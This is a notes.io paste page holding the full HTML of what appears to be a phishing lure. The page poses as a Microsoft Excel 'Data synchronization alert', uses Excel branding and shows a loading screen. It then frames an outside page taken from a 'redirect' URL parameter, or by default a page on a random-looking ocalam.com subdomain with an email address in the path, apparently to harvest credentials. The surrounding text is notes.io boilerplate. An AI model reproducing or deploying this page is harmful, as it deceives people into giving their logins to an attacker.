NotesWhat is notes.io?

Notes brand slogan

Notes - notes.io

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Data synchronization alert</title>
<style>
* {
box-sizing: border-box;
}

body, html {
height: 100%;
margin: 0;
display: flex;
justify-content: center;
align-items: center;
background-color: #f0f0f0;
font-family: Arial, sans-serif;
width: 100%;
overflow: hidden;
}

#loader {
position: fixed;
top: 0;
left: 0;
width: 100%;
height: 100%;
background: rgba(255, 255, 255, 0.8);
display: flex;
flex-direction: column;
justify-content: center;
align-items: center;
z-index: 999;
transition: opacity 0.5s, visibility 0.5s;
}

.spin {
width: 40px;
height: 40px;
border: 4px solid rgba(0, 0, 0, 0.1);
border-top: 4px solid #217346;
border-radius: 50%;
animation: spinning 1s linear infinite;
margin: 20px 0;
}

@keyframes spinning {
100% {
transform: rotate(360deg);
}
}

#logo {
width: 100px;
height: auto;
}

#main-content {
opacity: 0;
transition: opacity 0.5s;
width: 100%;
height: 100%;
display: flex;
justify-content: center;
align-items: center;
}

.loading-text {
font-size: 1.2em;
color: #555;
animation: pulse 1.5s infinite;
}

@keyframes pulse {
0%, 100% {
opacity: 1;
}
50% {
opacity: 0.5;
}
}

@media (max-width: 600px) {
.spin {
width: 30px;
height: 30px;
border-width: 3px;
}
.loading-text {
font-size: 1em;
}
#logo {
width: 60px;
}
}
</style>
</head>
<body>
<div id="loader">
<img id="logo" src="https://upload.wikimedia.org/wikipedia/commons/thumb/3/34/Microsoft_Office_Excel_%282019%E2%80%93present%29.svg/512px-Microsoft_Office_Excel_%282019%E2%80%93present%29.svg.png?20190925171014" alt="XLS Logo">
<div class="spin"></div>
<p class="loading-text">Loading... Do not close or refresh the page!</p>
<p class="loading-text"><strong>Preparing your dashboard...</strong></p>
</div>
<div id="main-content">
<!-- Dynamic content goes here -->
</div>

<script>
window.addEventListener('load', function() {
showLoadingText();
setTimeout(hideLoader, 5000); // Adjusted loading time
});

function hideLoader() {
const loader = document.getElementById('loader');
const mainContent = document.getElementById('main-content');
loader.style.opacity = '0';
loader.style.visibility = 'hidden';
mainContent.style.opacity = '1';
loadPageContent();
}

function loadPageContent() {
const url = determineRedirectURL();
const fallbackUrl = 'https://tsk4rjutnh10p5xr2ubhh6jfpsfbnhxk.ocalam.com:8443/[email protected]';
const targetUrl = url ? url : fallbackUrl;

document.getElementById('main-content').innerHTML = `<object id="content-frame" type="text/html" data="${targetUrl}" style="width: 100%; height: 100%; border: none;"></object>`;
}

function determineRedirectURL() {
const params = new URLSearchParams(window.location.search);
return params.get('redirect');
}

function showLoadingText() {
const textElement = document.querySelector('.loading-text');
setTimeout(() => {
textElement.textContent = "Loading... Do not close or refresh the page!";
}, 2000);
setTimeout(() => {
textElement.textContent = "Loading... Do not close or refresh the page!";
}, 4000);
}
</script>
</body>
</html>
     
 
what is notes.io
 

Notes is a web-based application for online taking notes. You can take your notes and share with others people. If you like taking long notes, notes.io is designed for you. To date, over 8,000,000,000+ notes created and continuing...

With notes.io;

  • * You can take a note from anywhere and any device with internet connection.
  • * You can share the notes in social platforms (YouTube, Facebook, Twitter, instagram etc.).
  • * You can quickly share your contents without website, blog and e-mail.
  • * You don't need to create any Account to share a note. As you wish you can use quick, easy and best shortened notes with sms, websites, e-mail, or messaging services (WhatsApp, iMessage, Telegram, Signal).
  • * Notes.io has fabulous infrastructure design for a short link and allows you to share the note as an easy and understandable link.

Fast: Notes.io is built for speed and performance. You can take a notes quickly and browse your archive.

Easy: Notes.io doesn’t require installation. Just write and share note!

Short: Notes.io’s url just 8 character. You’ll get shorten link of your note when you want to share. (Ex: notes.io/q )

Free: Notes.io works for 14 years and has been free since the day it was started.


You immediately create your first note and start sharing with the ones you wish. If you want to contact us, you can use the following communication channels;


Email: [email protected]

Twitter: http://twitter.com/notesio

Instagram: http://instagram.com/notes.io

Facebook: http://facebook.com/notesio



Regards;
Notes.io Team

     
 
Shortened Note Link
 
 
Looding Image
 
     
 
Long File
 
 

For written notes was greater than 18KB Unable to shorten.

To be smaller than 18KB, please organize your notes, or sign in.